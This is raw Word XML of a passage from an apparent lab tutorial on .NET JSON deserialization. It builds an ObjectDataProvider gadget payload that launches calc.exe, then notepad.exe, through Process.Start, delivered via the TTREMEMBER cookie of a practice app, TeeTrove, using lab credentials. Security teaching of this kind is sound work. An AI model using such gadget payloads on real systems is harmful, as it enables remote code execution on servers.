          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that the correct method will be called when we deserialize the object. We can also remove the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>IsAsynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>IsInitialLoadEnabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields since we don't require any specific values for these properties to achieve code execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C664B4" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73122A39"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1AEACEEF"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"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1174FA"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"ObjectType": "&lt;SNIP&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C15F9A"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"MethodName": "Start",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D8D68"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"MethodParameters": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6AF4A"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"$type": "&lt;SNIP&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569F81EC"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"$values": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404824FC"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"C:\\Windows\\System32\\cmd.exe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFA0C1"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 calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1486D15A"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131A16E1"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6AEC7D84"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0D98319C"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We can now test this payload to make sure the calculator is spawned with the following lines of code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3DC81" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F087E"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string payload = "{\"$type\":\"System.Windows.Data.ObjectDataProvider, PresentationFramework\",\"ObjectType\":\"&lt;SNIP&gt;\",\"MethodName\":\"Start\",\"MethodParameters\":{\"$type\":\"&lt;SNIP&gt;\",\"$values\":[\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"/c calc.exe\"]}}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695BC7D"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JsonConvert.DeserializeObject(payload, settings);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CE4C6"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Although you would think it should work, we ran into another error. We get an error in </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Process.Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> because a </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"file name was not provided"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01913FD9" w14:textId="6A8E9C5D"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="379FDE46" wp14:editId="460FE345">
            <wp:extent cx="5940425" cy="3190240"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1197523442"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190240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B18FC"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Luckily, with a bit of trial and error, the fix is simple. We must simply move the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"MethodName"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> field to after the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"MethodParameters"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> field, since right now the object creation is occurring before the parameters are set. So our updated payload will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A5B62" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306089C2"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02919213"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"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259D9807"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"ObjectType": "&lt;SNIP&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE1612"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"MethodParameters": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48016CA2"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"$type": "&lt;SNIP&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B15040"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"$values": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22609971"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"C:\\Windows\\System32\\cmd.exe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEB56FE"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 calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55755166"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10C08B1A"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45A51E24"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"MethodName": "Start"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A821FAB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05E619"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This time, when we run the payload, a calculator process should spawn!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659140B" w14:textId="19AED3B4"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1EF09C" wp14:editId="3724CBE5">
            <wp:extent cx="5940425" cy="3825240"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
            <wp:docPr id="1250040373"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825240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22629E00" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">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682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Exploiting TeeTrove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C541BB9"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With a working </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, let's try and exploit the JSON deserialization in </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>TeeTrove</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, except this time instead of a calculator let's spawn </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>notepad.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>, just to switch things up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B86B1E" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF20863"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52387111"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"$values": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56855F"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"C:\\Windows\\System32\\notepad.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44477271"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 xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE263B" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="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82576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D5C5B"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We can log into the website with the credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>pentest:pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, making sure to select the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"Remember Me"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> option, replace the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>TTREMEMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie with our payload, and log out of the application so that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"Remember Me"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality springs into action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CEE5E" w14:textId="1A618D2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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D014798" wp14:editId="66CB2544">
            <wp:extent cx="5940425" cy="3446780"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="159052947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446780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="767167C8"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At first, it appears that nothing is happening. However, when we attach </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>dnSpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to observe the process, we can discern that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>ObjectDataProvider</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> seems to have been deserialized correctly, as indicated by the exception received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7697A" w14:textId="2E2AAB5B"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75247186" wp14:editId="36CE94AE">
            <wp:extent cx="5940425" cy="2812415"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="209989409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812415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C86570B" w14:textId="77777777"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">Luckily for us, if we open up </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00682576">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          </w:rPr>
          <w:t>Process Explorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00682576">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          </w:rPr>
          <w:t>Sysinternals Suite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that a </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>notepad.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance was spawned as a child of </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>w3wp.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> process), so the payload did work after all!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C62639" w14:textId="24330183" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="122423AF" wp14:editId="6BFB5684">
            <wp:extent cx="5940425" cy="3764915"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="39093521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764915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4E0C98" w14:textId="77777777" w:rsidR="004518A8" w:rsidRDefault="004518A8"/>
    <w:sectPr w:rsidR="004518A8">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8A8"/>
    <w:rsid w:val="004518A8"/>
    <w:rsid w:val="0068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0C98"/>
  <w15:docId w15:val="{F5EC0EBB-C111-48D9-A7B6-F5D45AAE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257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682576"/>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682576"/>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682576"/>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68257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682576"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00682576"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006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682576"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00682576"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
